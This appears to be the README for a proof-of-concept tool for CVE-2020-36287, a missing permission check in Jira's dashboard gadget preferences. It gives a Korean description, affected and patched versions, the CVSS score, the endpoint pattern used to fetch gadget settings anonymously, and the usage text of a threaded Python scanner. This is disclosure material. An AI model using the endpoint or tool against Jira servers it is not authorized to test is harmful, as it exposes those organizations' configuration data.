
Jira Server 및 Jira Data Center 8.13.5 이전 버전과 8.14.0부터 8.15.1 이전 버전에서 사용되는 Atlassian gadgets 플러그인의 대시보드 가젯 기본 설정 리소스는 권한 확인 누락으로 인해 원격의 익명 공격자가 가젯 관련 설정을 얻을 수 있도록 허용합니다.
Jira Server 및 Jira Data Center에서 사용되는 Atlassian gadgets 플러그인의 대시보드 가젯 환경 설정 리소스는 버전 8.13.5 이전, 그리고 버전 8.14.0부터 8.15.1 이전까지 권한 검사 누락으로 인해 원격 익명 공격자가 가젯 관련 설정을 획득할 수 있습니다.
Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software)
Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1
CVEID: CVE-2020-36287
CVSS Score: 5.3 (Medium)
CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Fully Patched Version: 8.13.5, 8.15.1, 8.16.0
Link: https://site.com/secure/Dashboard.jspa
POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
usage: CVE-2020-36287.py [-h] [-t THREADS] [-o TIMEOUT] -u URL
optional arguments:
-h, --help show this help message and exit
-t THREADS, --threads THREADS
number of threads (15)
-o TIMEOUT, --timeout TIMEOUT
timeout
-u URL, --url URL url